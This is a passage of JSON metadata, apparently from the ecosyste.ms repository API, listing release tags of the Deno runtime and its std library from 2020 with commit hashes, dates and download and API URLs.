ll,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/